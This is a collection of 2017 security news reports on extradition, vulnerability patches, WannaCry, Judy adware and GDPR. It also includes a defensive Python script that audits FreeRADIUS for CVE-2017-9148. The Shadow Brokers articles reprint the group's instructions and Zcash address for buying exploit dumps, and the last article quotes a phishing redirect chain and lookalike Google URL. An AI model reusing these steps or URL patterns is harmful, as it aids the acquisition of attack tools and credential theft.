Nikulin lodged a complaint against the part of the verdict that says he can be extradited to the United States, she added. Czech Justice Minister Robert Pelikan will make the final decision on the extradition, Puci said.

"It will now go to the High Court in Prague, and the final word is up to the justice minister who will decide to which country he will be extradited or whether he'll be extradited at all," she told AFP.

Czech police, acting in a joint operation with the US Federal Bureau of Investigation (FBI), arrested Nikulin in Prague last October.

The arrest came as Washington formally accused the Russian government of trying to "interfere" in the 2016 White House race through hacking, charges the Kremlin has dismissed.

Moscow immediately accused Washington of harassing its citizens and vowed to fight Nikulin's extradition.

It then issued a separate arrest warrant for him over alleged theft from the WebMoney settlement system.

The US has charged Nikulin with hacking into social networks LinkedIn and Formspring and into the file hosting service Dropbox, Nikulin's lawyer Martin Sadilek told AFP.

He also said Nikulin alleges that FBI investigators had tried in November 2016 and then again in February to persuade him to confess to cyberattacks on the US Democratic Party.

"First it was an unknown English-speaking man who questioned him and allegedly called someone named Jeffrey.

"On February 7, in the official presence of (US) officials, it was allegedly (FBI agent) Jeffrey Miller who questioned him," Sadilek told AFP.

Last July, campaign officials for Democratic US presidential candidate Hillary Clinton blamed Russia for an embarrassing leak of emails from the Democratic National Committee.

Russia has been accused of favoring Republican candidate Donald Trump -- who has praised Putin and called for better ties with Moscow -- over the more hawkish Clinton.


The economic impact of cybercrime will reach $8 Trillion by 2022
30.5.2017 securityaffairs CyberCrime

According to a report published by Juniper Research, the economic impact of cybercrime is expected to reach $8 trillion over the next five years.
The same report estimates that 2.8 billion data records will be compromised in security breaches in 2017.

The spread of IoT devices is enlarging the attack surface and will be one of the factors sustaining this trend.
Small and mid-size businesses (SMBs) are the most exposed: in 2017 they will spend, on average, less than $4,000 a year on cyber security, and experts believe they will not increase their budgets despite the rising threat.

Poor patch management, low awareness of cyber threats, and the use of outdated software are the main weaknesses in the way SMBs approach cyber security.

The full Juniper Research report contains a lot of interesting data, but unfortunately it is not free.


Vulnerabilities Patched in Aruba Access Policy Platform

30.5.2017 securityweek Vulnerebility
HPE-owned network access solutions provider Aruba informed customers last week that the company’s ClearPass Policy Manager access policy platform is affected by several vulnerabilities.

The most serious of the flaws, based on its CVSS score, is a high-severity unauthenticated remote code execution vulnerability tracked as CVE-2017-5824. Another high-severity issue is an information disclosure bug (CVE-2017-5647) in the bundled Apache Tomcat.

The other security holes, classified as medium and low severity, include authenticated remote code execution (CVE-2017-5826), reflected XSS (CVE-2017-5827), privilege escalation (CVE-2017-5825), arbitrary command execution via XXE (CVE-2017-5828), and access restriction bypass issues (CVE-2017-5829).

The vulnerabilities affect all ClearPass Policy Manager versions prior to 6.6.5. Users have been advised to update the product to version 6.6.5 and apply an additional hotfix made available on May 24.

A majority of these vulnerabilities were reported by Luke Young and V. Harishkumar through the company’s Bugcrowd-powered private bug bounty program. The XSS flaw was reported by Phil Purviance of Bishop Fox.

Aruba has been running a private bug bounty program since October 2014 and by the end of 2016 it had already received more than 500 vulnerability reports from 67 researchers. The company has offered up to $1,500 per bug.

In addition to the advisory describing ClearPass Policy Manager flaws, Aruba informed customers last week of a high severity remote code execution vulnerability affecting Airwave Software Glass versions 1.0.0 and 1.0.1. The weakness, tracked as CVE-2017-8946, has been addressed in version 1.0.1-1.


Microsoft Patches Several Malware Protection Engine Flaws

30.5.2017 securityweek Vulnerebility
Microsoft Fixes Several Antimalware Engine Vulnerabilities Found by Google Researchers

Microsoft has released an out-of-band update for its Malware Protection Engine to patch several remote code execution and denial-of-service (DoS) vulnerabilities discovered by Google Project Zero researchers.

Version 1.1.13804.0 of the Microsoft Malware Protection Engine, released on Thursday, addresses a total of eight vulnerabilities identified by various members of Google Project Zero, including Mateusz Jurczyk, Tavis Ormandy, Lokihart and Ian Beer.

Jurczyk has been credited for finding four of the security holes, namely CVE-2017-8536, CVE-2017-8538, CVE-2017-8537 and CVE-2017-8535. The researcher used fuzzing to find heap-based buffer overflow, NULL pointer dereference and other memory corruption vulnerabilities that can lead to arbitrary code execution or a crash of the Malware Protection Engine (MsMpEng) service.

On Friday, after learning of Microsoft’s update for the antimalware engine, Jurczyk published an advisory containing some technical information and proof-of-concept (PoC) code. Ormandy and Beer also made public advisories, including PoC code, for vulnerabilities patched in the latest version of the Malware Protection Engine.

According to Microsoft, the vulnerabilities exist due to the fact that the antimalware engine does not properly scan specially crafted files. An attacker can exploit them for remote code execution and DoS attacks by getting the engine to scan a malicious file, which can be accomplished via several methods.

“For example, an attacker could use a website to deliver a specially crafted file to the victim's system that is scanned when the website is viewed by the user,” Microsoft said. “An attacker could also deliver a specially crafted file via an email message or in an Instant Messenger message that is scanned when the file is opened. In addition, an attacker could take advantage of websites that accept or host user-provided content, to upload a specially crafted file to a shared location that is scanned by the Malware Protection Engine running on the hosting server.”

The vulnerabilities affect several Microsoft products that use the antimalware engine, including Windows Defender, Exchange Server, Windows Intune Endpoint Protection, Security Essentials, Endpoint Protection and Forefront Endpoint Protection. Users of these products do not have to take any action as the update has been applied automatically.

While Microsoft and Google have had some problems when it comes to vulnerability disclosures – Google Project Zero disclosed the details of several flaws in the past before patches were made available – Microsoft has been moving quickly to resolve Malware Protection Engine issues.

Earlier this month, it took the company less than three days to patch a critical remote code execution vulnerability found by Ormandy and Google Project Zero researcher Natalie Silvanovich. The flaws disclosed by Google last week were reported to Microsoft on May 12 and May 16.

Ormandy recently made available a tool for porting Windows dynamic link library (DLL) files to Linux in an effort to improve fuzzing. He demonstrated the tool’s capabilities by porting the Malware Protection Engine to Linux.

Porting the antimalware engine to Linux has made it easier for Google Project Zero researchers to conduct fuzzing and find vulnerabilities.


You can take Shadow Brokers Zero Day Exploit Subscriptions for $21,000 per month
30.5.2017 securityaffairs BigBrothers
Shadow Brokers is going to launch a monthly subscription model for its data dumps, 0-Day Exploit Subscriptions goes for $21,000 per month.
A couple of weeks ago, while security experts were debating the WannaCry ransomware and the NSA exploits it used, the Shadow Brokers revealed a plan to sell new exploits every month, starting in June, through a monthly subscription model.

The group claimed to have exploit codes for almost any technology available on the market, including “compromised network data from more SWIFT providers and Central banks.”

According to the group's announcement, TheShadowBrokers Monthly Data Dump could include:

web browser, router, handset exploits and tools
select items from newer Ops Disks, including newer exploits for Windows 10
compromised network data from more SWIFT providers and Central banks
compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs
Now, as announced, the group will release new zero-day exploits and hacking tools for various platforms starting in June 2017.

The crew is back with details on how to subscribe to the monthly service and receive access to future leaks.

The Shadow Brokers have released the following instructions for subscribing to what they call the “Wine of Month Club.”

Welcome to TheShadowBrokers Monthly Dump Service – June 2017

Q: How do I subscribe and get the next theshadowbrokers’ dump (June 2017)?

#1 – Between 06/01/2017 and 06/30/2017 send 100 ZEC (Zcash) to this z_address:

zcaWeZ9j4DdBfZXQgHpBkyauHBtYKF7LnZvaYc4p86G7jGnVUq14KSxsnGmUp7Kh1Pgivcew1qZ64iEeG6vobt8wV2siJiq

#2 – Include a “delivery email address” in the “encrypted memo field” when sending Zcash payment

#3 – If #1 and #2 then a confirmation email will be sent to the “delivery email address” provided

#4 – Between 07/01/2017 and 07/17/2017 a “mass email” will be send to the “delivery email address” of all “confirmed subscribers” (#1, #2, #3)

#5 – The “mass email” will contain a link and a password for the June 2017 dump

Shadow Brokers

In summary, anyone interested in joining the “wine of month club” must send 100 ZEC (Zcash), about 21,519 USD at current rates, and include a ‘delivery email address’ in the ‘encrypted memo field’.

Once the payment is received, the Shadow Brokers will send a confirmation email to the “delivery email address” provided by the subscriber.

The price is very low: 21,000 USD for such valuable material is a bargain for intelligence agencies and criminal syndicates.

Between 07/01/2017 and 07/17/2017 the group plans to send a link and a personal password to the subscribers for the June 2017 data dump.

The Shadow Brokers have not yet decided the content of the June 2017 dump; in the same post, the crew also expressed doubts about the anonymity provided by the Zcash cryptocurrency and the Tor network.

“Zcash is having connections to USG (DARPA, DOD, John Hopkins) and Israel. Why USG is “sponsoring” privacy version of bitcoin? Who the fuck is knowing? In defense, TOR is originally being by similar parties. TheShadowBrokers not fully trusting TOR either,” the Shadow Brokers writes.

Experts believe the group will release authentic exploits and hacking tools, given that its past leaks proved genuine.

The data dump could have a dramatic impact on organizations and business worldwide.

Stay tuned…


Shadow Brokers Launches 0-Day Exploit Subscriptions for $21,000 Per Month
30.5.2017 thehackernews BigBrothers
As promised, with more zero-day exploits and hacking tools for various platforms due to be released starting in June 2017, the infamous hacking group Shadow Brokers is back with details on how to subscribe and become a private member receiving exclusive access to future leaks.
The Shadow Brokers is the same hacking group that leaked the NSA-built Windows hacking tools and zero-day exploits that led to the WannaCry outbreak.
When the Shadow Brokers promised its June 2017 release two weeks ago, the group announced that it would sell new zero-day exploits and hacking tools only to private members with a paid monthly subscription, instead of making them public for everyone.
How to Become Member of the 'Wine of Month' Club?
Now, just a few minutes ago, the hacking collective has released details about how to participate in the monthly subscription model – or the "Wine of Month Club," as the group called it – to get exclusive access to the upcoming leaks each month starting from June.
So, those interested in buying membership of the "wine of month club" need to:
Send 100 ZEC (Zcash), which is around $21,519 USD, to this z_address (zcaWeZ9j4DdBfZXQgHpBkyauHBtYKF7LnZvaYc4p86G7jGnVUq14KSxsnGmUp7Kh1Pgivcew1qZ64iEeG6vobt8wV2siJiq) between 06/01/2017 and 06/30/2017.
Include a 'delivery email address' in the 'encrypted memo field' when sending Zcash payment.
Once done, the Shadow Brokers will send a payment confirmation email to "delivery email address" provided by all interested members.
Then between 07/01/2017 and 07/17/2017, the group will send another email to all confirmed members, containing a link and their unique password for the June 2017 data dump.
Launched in late October 2016, Zcash is a cryptocurrency that claims to be more anonymous than Bitcoin, as the sender, recipient, and value of transactions remain hidden. However, the group says it does not even trust Zcash and Tor for absolute anonymity.
"Zcash is having connections to USG (DARPA, DOD, John Hopkins) and Israel. Why USG is "sponsoring" privacy version of bitcoin? Who the fuck is knowing? In defense, TOR is originally being by similar parties. TheShadowBrokers not fully trusting TOR either," the Shadow Brokers writes.
What is Going to be in the Next Data Dump?
The hacking collective says the membership has been kept expensive because the data dump has been intended for hackers, security companies, government, and OEMs.
"If you caring about losing $20k+ Euro then not being for you. Monthly dump is being for high rollers, hackers, security companies, OEMs, and governments," the Shadow Brokers say.
Although what the June dump would contain is not clear at the moment, the Shadow Brokers' last announcement claimed that the upcoming data dump would include:
Exploits for operating systems, including Windows 10.
Exploits for web browsers, routers, and smartphones.
Compromised data from banks and Swift providers.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
Keeping in mind the damage caused by the leaked NSA exploits, it would make sense for security companies to buy the June dump for $21,000 and fix their products before attackers get their hands on the new zero-day exploits.
The claims made by the Shadow Brokers remain unverified at the time of writing, but since its previously released dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the NSA's backdoors released by the group last month were used by WannaCry and other malware to cause chaos worldwide.
If the announcement made by the Shadow Brokers comes out to be true, the world should be well prepared for another WannaCry-like massive destroyer.
Shadow Brokers Emptied their Bitcoin Account
Before publicly dumping the stolen NSA zero-day exploits in April, the Shadow Brokers auctioned those cyber weapons for 1 million Bitcoin.
Although the auction did not go well, the Bitcoin address set up by the group to collect bids received a total of 10.5 Bitcoin (around $24,000).
Finally, on Monday, the Shadow Brokers emptied their Bitcoin account, moving all the Bitcoins to subsidiary Bitcoin addresses.


India's Ethical Hackers Rewarded Abroad, Ignored at Home

30.5.2017 securityweek  Hacking
Kanishk Sajnani did not receive so much as a thank you from a major Indian airline when he contacted them with alarming news -- he had hacked their website and could book flights anywhere in the world for free.

It was a familiar tale for India's army of "ethical hackers", who earn millions protecting foreign corporations and global tech giants from cyber attacks but are largely ignored at home, their skills and altruism misunderstood or distrusted.

India produces more ethical hackers -- those who break into computer networks to expose, rather than exploit, weaknesses -- than anywhere else in the world.

The latest data from BugCrowd, a global hacking network, showed Indians raked in the most "bug bounties" -- rewards for red-flagging security loopholes.

Facebook, which has long tapped hacker talent, paid more to Indian researchers in the first half of 2016 than any other researchers.

Indians outnumbered all other bug hunters on HackerOne, another registry of around 100,000 hackers. One anonymous Indian hacker -- "Geekboy" -- has found more than 700 vulnerabilities for companies like Yahoo, Uber and Rockstar Games.

Most are young "techies" -- software engineers swelling the ranks of India's $154-billion IT outsourcing sector whose skill set makes them uniquely gifted at cracking cyber systems.

"People who build software in many cases also understand how it can be broken," HackerOne co-founder Michiel Prins told AFP by email.

But while technology behemoths and multinationals are increasingly reliant on this world-class hacking talent, just a handful of Indian firms run bug bounty programs.

Information volunteered by these cyber samaritans is often treated with indifference or suspicion, hackers and tech industry observers told AFP.

Anand Prakash, a 23-year-old security engineer who has earned $350,000 in bug bounties, said Facebook replied almost immediately when he notified them of a glitch allowing him to post from anyone's account.

"But here in India, the email is ignored most of the time," Prakash told AFP from Bangalore where he runs his own cyber security firm AppSecure India.

"I have experienced situations many times where I have a threatening email from a legal team saying 'What are you doing hacking into our site?'"

Sajnani, who has hacked around a dozen Indian companies, said he was once offered a reward by a company that dropped off the radar once the bugs were fixed.

"Not getting properly acknowledged, or companies not showing any gratitude after you tried to help them, that is very annoying," the 21-year-old told AFP from Ahmedabad, where he hunts for software glitches in between his computer engineering studies.

- Attitudes changing -

An unwillingness to engage its homegrown hackers has backfired spectacularly for a number of Indian startups, forcing a long-overdue rethink of attitudes toward cyber security.

In 2015, Uber-rival Ola launched what it called a "first of its kind" bounty program in India after hackers repeatedly exposed vulnerabilities in the hugely-popular app.

This month Zomato, a food and restaurant guide operating in 23 countries, suffered an embarrassing breach when a hacker stole 17 million user records from its supposedly secure database.

The hacker "nclay" threatened to sell the information unless Zomato, valued at hundreds of millions of dollars, offered bug hunters more than just certificates of appreciation for their honesty.

"If they were paying money to the good guys, maybe 'nclay' would have reported the vulnerability and made the money the right way," Waqas Amir, founder of cyber security website HackRead, told AFP by email.

The incident was especially galling for Prakash. He had hacked Zomato's database just two years earlier, and said if they listened to him then "they would never have been breached in 2017."

In a mea culpa rare for an Indian tech company, Zomato agreed to launch a "healthy" bounty program and encourage other firms to work with ethical hackers.

"We should have taken this more seriously earlier," a Zomato spokeswoman said in a statement to AFP.

The Zomato hack, and panic surrounding this month's global WannaCry cyber attack, comes as the Indian government aggressively denies suggestions its massive biometric identification program is susceptible to leaks.

The government has staunchly defended its "Aadhaar" program, which stores the fingerprints and iris scans of more than one billion Indians on a national database, and has accused those who have raised concerns of illegal hacking.

Prakash said it was vital the government embrace its own through a program like the "Hack the Pentagon" initiative, which last year saw 1,400 security engineers invited to poke holes in the US Department of Defense's cyber fortifications.

"The Indian government definitely needs a bounty programme to make their system more secure," Prakash said.


FreeRADIUS allows hackers to log in without credentials
30.5.2017 securityaffairs Vulnerability

The security researcher Stefan Winter has discovered a TLS resumption authentication bypass in FreeRADIUS, the world’s most popular RADIUS Server.
The security researcher Stefan Winter from the Luxembourg’s high-speed academic network RESTENA has discovered a FreeRADIUS TLS resumption authentication bypass.

FreeRADIUS is the world’s most popular RADIUS Server, “it is the basis for multiple commercial offerings. It supplies the AAA needs of many Fortune-500 companies and Tier 1 ISPs. It is also widely used for Enterprise Wi-Fi and IEEE 802.1X network security, particularly in the academic community, including eduroam.”

The flaw, tracked as CVE-2017-9148, resides in the TTLS and PEAP implementations, which skip inner authentication when handling a resumed TLS connection.

“The implementation of TTLS and PEAP in FreeRADIUS skips inner authentication when it handles a resumed TLS connection. This is a feature but there is a critical catch: the server must never allow resumption of a TLS session until its initial connection gets to the point where inner authentication has been finished successfully. Unfortunately, affected versions of FreeRADIUS fail to reliably prevent resumption of unauthenticated sessions unless the TLS session cache is disabled completely and allow an attacker (e.g. a malicious supplicant) to elicit EAP Success without sending any valid credentials,” reads the description published in the advisory.

Communication interruptions are very frequent, for example when a user on a TLS connection moves from one cell tower to another, and because of the flaw the resumed session is not asked for a new login.

The versions affected by the CVE-2017-9148 flaw are:

2.2.x (EOL but still found in some Linux distros): All versions.
3.0.x (stable): All versions before 3.0.14.
3.1.x and 4.0.x (development): All versions before 2017-02-04.
Sysadmins who run FreeRADIUS installs need to upgrade to version 3.0.14, which fixes the issue; a temporary mitigation can be obtained by disabling TLS session caching.

The advisory suggested the following mitigation actions:

(a) Disable TLS session caching. Set enabled = no in the cache subsection of eap module settings (raddb/mods-enabled/eap in the standard v3.0.x-style layout).
(b) Upgrade to version 3.0.14.
Looking at the timeline of the flaw, we can notice that it was also independently reported on April 24, 2017, by the researcher Luboš Pavlíček from the University of Economics, Prague.
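As an added example (not from the advisory or the FreeRADIUS project), the following Python script turns the affected-version list and mitigation (a) into an audit check: it classifies a radiusd version banner against the ranges above and walks a sample eap module file to see whether the TLS session cache is switched on. The sample config, the hypothetical assess() verdict labels, and accepting both enable and enabled as the key name are assumptions.

```python
import re

# Affected ranges as listed in the advisory for CVE-2017-9148 (quoted above):
# 2.2.x: every release; 3.0.x: every release before 3.0.14;
# 3.1.x and 4.0.x: development snapshots, judged by build date, not version.
FIXED_30 = (3, 0, 14)


def parse_version(text):
    """Pull an x.y.z triple out of a 'radiusd -v' banner or a bare version string."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError("no x.y.z version in %r" % text)
    return tuple(int(part) for part in match.groups())


def is_affected(version_text):
    """True/False for the release branches named in the advisory; None for the
    development branches (3.1.x/4.0.x) and for anything the advisory does not cover."""
    major, minor, patch = parse_version(version_text)
    if (major, minor) == (2, 2):
        return True
    if (major, minor) == (3, 0):
        return (major, minor, patch) < FIXED_30
    return None


def session_cache_enabled(config_text):
    """Walk a FreeRADIUS eap module file and report whether a 'cache' subsection
    below 'eap' switches TLS session caching on. The advisory spells the key
    'enabled'; the 3.0.x mods-available/eap shipped with FreeRADIUS spells it
    'enable', so both are accepted here (assumption: yes/on/true/1 mean on)."""
    stack = []        # names of the { } sections currently open
    enabled = False   # caching stays off unless a cache block turns it on
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and padding
        if not line:
            continue
        if line.endswith("{"):
            # "eap {", "tls-config tls-common {", "cache {": keep the first word
            words = line[:-1].split()
            stack.append(words[0] if words else "")
        elif line == "}":
            if stack:
                stack.pop()
        elif "=" in line and "eap" in stack and stack[-1] == "cache":
            key, _, value = (part.strip() for part in line.partition("="))
            if key in ("enable", "enabled"):
                enabled = value.strip('"').lower() in ("yes", "on", "true", "1")
    return enabled


def assess(version_text, config_text):
    """Combine both checks into the verdict an admin wants after reading the advisory
    (hypothetical labels: patched / mitigated / exposed / check build date)."""
    affected = is_affected(version_text)
    if affected is False:
        return "patched"
    if affected is None:
        return "check build date"   # dev snapshots are fixed only from 2017-02-04
    return "exposed" if session_cache_enabled(config_text) else "mitigated"


# Constructed sample of raddb/mods-enabled/eap, trimmed to the relevant sections.
VULNERABLE_EAP = """\
eap {
    default_eap_type = peap
    tls-config tls-common {
        private_key_file = ${certdir}/server.pem
        cache {
            enable = yes        # resumption allowed: unsafe before 3.0.14
            lifetime = 24
        }
    }
    peap {
        tls = tls-common
    }
}
"""

# Mitigation (a) from the advisory: the same file with session caching switched off.
MITIGATED_EAP = VULNERABLE_EAP.replace("enable = yes", "enable = no")

if __name__ == "__main__":
    for banner in ("FreeRADIUS Version 3.0.13", "FreeRADIUS Version 3.0.14",
                   "radiusd: FreeRADIUS Version 2.2.10"):
        print(banner, "->", assess(banner, VULNERABLE_EAP),
              "/ with cache off:", assess(banner, MITIGATED_EAP))
```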


With Less Than 1 Year To Go Companies Place Different Priorities on GDPR Compliance
30.5.2017 securityaffairs Privacy

The European General Data Protection Regulation (GDPR) will take effect in one year from now, but a large number of firms are far from prepared.
It feels like Y2K all over again. We are less than one year until the impact of the GDPR is realized, no one is certain what will happen, and everyone is taking a different approach to mitigation.

In April 2016, the European Union introduced the General Data Protection Regulation (GDPR), and it goes into effect in May 2018. The GDPR aims to “create more consistent protection of consumer and personal data across EU nations.” (https://digitalguardian.com/blog/what-gdpr-general-data-protection-regulation-understanding-and-complying-gdpr-data-protection) One way to summarize the requirements is to say that companies that have operations in the EU or do business with EU citizens must know where the EU citizens’ data in their care is located, ensure it is being handled appropriately, remove the data when requested and notify citizens promptly when their data has been compromised. As an individual, this seems an obvious expectation, but working in a company you learn that information has a way of spreading among people and systems, and trying to control it is very difficult.

“What’s most worrying about the findings,” comments Matt Lock, director of sales engineers at Varonis, “is that one in four organizations doesn’t have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year’s time. If they don’t have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are minuscule and they are putting themselves firmly at the front of the queue for fines.” (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns)
Any company found to be in violation of the regulation faces fines and penalties of up to 4% of its global annual revenue. It is this penalty that has companies taking note and working hard to ensure compliance. But not everyone is taking it seriously, or at least not everyone has started.

A recent survey conducted on behalf of Varonis highlights a disparity between the priorities of company executives and those responsible for ensuring compliance. Among the 500 IT decision makers surveyed, 75% “face serious challenges in being compliant with the EU GDPR” by the deadline. (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns) Not surprising when you learn 42% of company executives do not view compliance by the deadline as a priority. Where does this disparity come from?

The survey included companies from the UK, Germany, France and the US. These companies undoubtedly have different experiences with regulators based on their geographic locations and their operating industries. Some regulators tend to be collaborative in finding a resolution while others tend towards punitive actions. We don’t yet know how EU regulators will apply the GDPR penalties. 92% of respondents expect that a specific industry “will be singled out as an example in the event of a breach” (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns) with 52% of UK respondents predicting banking, while France and Germany overwhelmingly predict a breach in technology and telecommunications to be the example.

Regardless of who is first, the scale of the first penalty will be the signal to company executives on how much they should devote to compliance. And as with all business decisions, it is a matter of minimizing costs to maximize profitability.

56% of UK respondents believe the GDPR will increase complexity for IT teams and result in higher prices for customers, with 22% seeing no benefit to their business. (https://www.infosecurity-magazine.com/news/uk-it-leaders-gdpr-will-drive-up/) With these kinds of numbers, it will be difficult to get executive support for compliance efforts. However, 35% of companies surveyed believe GDPR compliance will be beneficial, with better protection for personal data being the biggest improvement. While the GDPR only addresses personal information, the exercise will help companies understand the effort required to manage data better, and some may see unexpected benefits.

Leading up to January 1, 2000 there were many similar stories about companies taking different approaches to Y2K remediation. Some had enormous, expensive projects running for years, others scrambled at the end of 1999 while a few focused on response planning and hoped for the best. The requirements of the GDPR are well documented, but the likelihood and size of penalties are still unknown. Different companies take different approaches based on industry, geography, and individual risk tolerances. The only certainty is that everyone is watching for the first big consumer data breach in the EU in 2018 and hoping it isn’t theirs.


Linguistic Analysis Suggests WannaCry Hackers Could be From Southern China
30.5.2017 thehackernews Ransomware

It’s been almost four weeks since the outbreak of the WannaCry ransomware, but the hackers behind the self-spreading ransomware threat have not been identified yet.
However, two weeks ago researchers at Google, Kaspersky Lab, Intezer and Symantec linked WannaCry to ‘Lazarus Group,’ a state-sponsored hacking group believed to work for the North Korean government.
Now, new research from dark web intelligence firm Flashpoint indicates the perpetrators may be Chinese, based on its own linguistic analysis.
Flashpoint researchers Jon Condra and John Costello analyzed each of WannaCry's localized ransom notes, which are available in 28 languages, for content, accuracy, and style, and discovered that all the notes, except the English and Chinese versions (Simplified and Traditional), had been translated via Google Translate.
According to the research, Chinese and English versions of the ransomware notes were most likely written by a human.
On further analysis, researchers discovered that the English ransom note contains a "glaring" grammatical error, which suggests the ransomware author may be a non-native English speaker.
“Though the English note appears to be written by someone with a strong command of English, a glaring grammatical error in the note suggests the speaker is non-native or perhaps poorly educated.”
And since Google Translate does not work well when translating between Chinese and English, and often produces inaccurate results, the English version was most likely written to serve as the source for translating the ransom note into the other languages.

“Comparisons between the Google translated versions of the English ransomware note to the corresponding WannaCry ransom note yielded nearly identical results, producing a 96% or above match.”
According to the Flashpoint report, the Chinese ransom notes contain "substantial content not present in any other version of the note," and they are longer than and formatted differently from the English one.
The Chinese ransom notes also use proper grammar, punctuation, syntax, and character choice – indicating that the ransomware writer is fluent in the Chinese language.
"A typo in the note, bang zu (幫組) instead of bang zhu (幫助), which means ‘help,' strongly indicates the note was written using a Chinese-language input system rather than being translated from a different version," the researchers explain.
"The text uses certain terms that further narrow down a geographic location. One term, libai ( 禮拜 ) for ‘week,’ is more common in southern China, Hong Kong, Taiwan, and Singapore...The other “杀毒软件” for “anti-virus” is more common in the Chinese mainland."
All these clues led Flashpoint researchers to believe, with high confidence, that the unknown author or authors of the WannaCry ransomware are fluent Chinese speakers and that the Chinese note is the source of the English version of the ransom note.
However, Flashpoint researchers say it's hard to speculate about the nationality of the WannaCry hackers, as they may be affiliated with any of the regions mentioned (China, Hong Kong, Taiwan, or Singapore).
The WannaCry epidemic hit more than 300,000 PCs in more than 150 countries within just 72 hours, using self-spreading capabilities to infect vulnerable Windows PCs, particularly those using older versions of the operating system.
While most of the affected organisations have now returned to normal, law enforcement agencies across the world are on the hunt.


Judy Android Malware Infects Over 36.5 Million Google Play Store Users
30.5.2017 securityaffairs Android
Security researchers have claimed to have discovered possibly the largest malware campaign on Google Play Store that has already infected around 36.5 million Android devices with malicious ad-click software.

The security firm Checkpoint on Thursday published a blog post revealing more than 41 Android applications from a Korean company on Google Play Store that make money for its creators by creating fake advertisement clicks from the infected devices.

All the malicious apps, developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp, contained an adware program, dubbed Judy, that is being used to generate fraudulent clicks to generate revenue from advertisements.

Moreover, the researchers also uncovered a few more apps, published by other developers on Play Store, that inexplicably contained the same malware.

The connection between the two campaigns remains unclear, though researchers believe it is possible that one developer borrowed code from the other, "knowingly or unknowingly."

"It is quite unusual to find an actual organization behind the mobile malware, as most of them are developed by purely malicious actors," CheckPoint researchers say.
The apps as published on Play Store do not themselves contain any malicious code, which is how they bypassed Google Bouncer's protections.

Once downloaded, the app silently registers the user's device with a remote command and control server, and in reply it receives the actual malicious payload, containing JavaScript that starts the malicious process.

"The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website," the researchers say. "Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure."
The malicious apps are actual legitimate games, but in the background, they act as a bridge to connect the victim’s device to the adware server.

Once the connection is established, the malicious app spoofs its user agent to pose as a desktop browser, opens a page and generates clicks.

Here’s a list of malicious apps developed by Kiniwini and if you have any of these installed on your device, remove it immediately:

• Fashion Judy: Snow Queen style
• Animal Judy: Persian cat care
• Fashion Judy: Pretty rapper
• Fashion Judy: Teacher style
• Animal Judy: Dragon care
• Chef Judy: Halloween Cookies
• Fashion Judy: Wedding Party
• Animal Judy: Teddy Bear care
• Fashion Judy: Bunny Girl Style
• Fashion Judy: Frozen Princess
• Chef Judy: Triangular Kimbap
• Chef Judy: Udong Maker – Cook
• Fashion Judy: Uniform style
• Animal Judy: Rabbit care
• Fashion Judy: Vampire style
• Animal Judy: Nine-Tailed Fox
• Chef Judy: Jelly Maker – Cook
• Chef Judy: Chicken Maker
• Animal Judy: Sea otter care
• Animal Judy: Elephant care
• Judy’s Happy House
• Chef Judy: Hotdog Maker – Cook
• Chef Judy: Birthday Food Maker
• Fashion Judy: Wedding day
• Fashion Judy: Waitress style
• Chef Judy: Character Lunch
• Chef Judy: Picnic Lunch Maker
• Animal Judy: Rudolph care
• Judy’s Hospital: Pediatrics
• Fashion Judy: Country style
• Animal Judy: Feral Cat care
• Fashion Judy: Twice Style
• Fashion Judy: Myth Style
• Animal Judy: Fennec Fox care
• Animal Judy: Dog care
• Fashion Judy: Couple Style
• Animal Judy: Cat care
• Fashion Judy: Halloween style
• Fashion Judy: EXO Style
• Chef Judy: Dalgona Maker
• Chef Judy: ServiceStation Food
• Judy’s Spa Salon

At least one of these apps was last updated on Play Store in April last year, which means the malicious apps had been propagating for more than a year.

Google has now removed all above-mentioned malicious apps from Play Store, but since Google Bouncer is not sufficient to keep bad apps out of the official store, you have to be very careful about downloading apps.


Russian Hackers Made 'Tainted Leaks' a Thing — Phishing to Propaganda

29.5.2017 thehackernews BigBrothers

We come across many leaks of sensitive government and corporate data on the Internet these days, but how accurate is the information leaked by unknown actors? How much of what you trust completely is actually real?
Security researchers have discovered new evidence of one such sophisticated global espionage and disinformation campaign, with suspected ties to the Russian government, aimed at discrediting enemies of the state.
Although there is no definitive proof of the Russian government's involvement in the campaign, there is "overlap" with previously reported cyber espionage activities tied to a Russia-backed hacking group well known as APT28.
APT28 — also known as Fancy Bear, Sofacy, Sednit, and Pawn Storm — is the same group that was responsible for the Democratic National Committee (DNC) breach. The group has been operating since at least 2007 and has alleged ties to the Russian government.
A new report, titled Tainted Leaks, published this week by the Citizen Lab at the University of Toronto's Munk School of Global Affairs gives a new view on how Russian state-sponsored hackers targeted over 200 Gmail users, including journalists, activists critical of the Kremlin and those connected with the Ukrainian military to steal sensitive emails from their accounts.

The hackers then manipulated the stolen emails before publishing them on the Internet, planting disinformation alongside legitimate leaks.
"It provides evidence of how documents stolen from a prominent journalist and critic of Russia were tampered with and then "leaked" to achieve specific propaganda aims," the researchers wrote.
Citizen Lab researchers said that the hackers abused Google's own services and used phishing emails to steal Gmail credentials from 218 targets across 39 countries, including former US defense officials, a former Russian prime minister, and a Ukrainian military official.
Researchers detected the campaign in October 2016, but the attacks were going on for several months before that.
Phishing Attack Abuses Google's Own Service

The attackers sent phishing emails that looked almost identical to Google's security warnings, alerting victims that someone had obtained their password and that they should change it right away.
But, as soon as the victims visited the link and entered their login details, the hackers gained access to their accounts.
The phishing link was convincing enough to trick victims into handing over their credentials because the campaign combined Google AMP's open redirect with a URL-shortening service to hide its phishing pages:
https://www.google.com/amp/tiny.cc/(redacted)
Which redirects to:
hxxp://myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin.id833[.]ga/security/signinoptions/password
The landing URL above looks like Google's password-reset page and captures users' credentials as soon as they are entered.
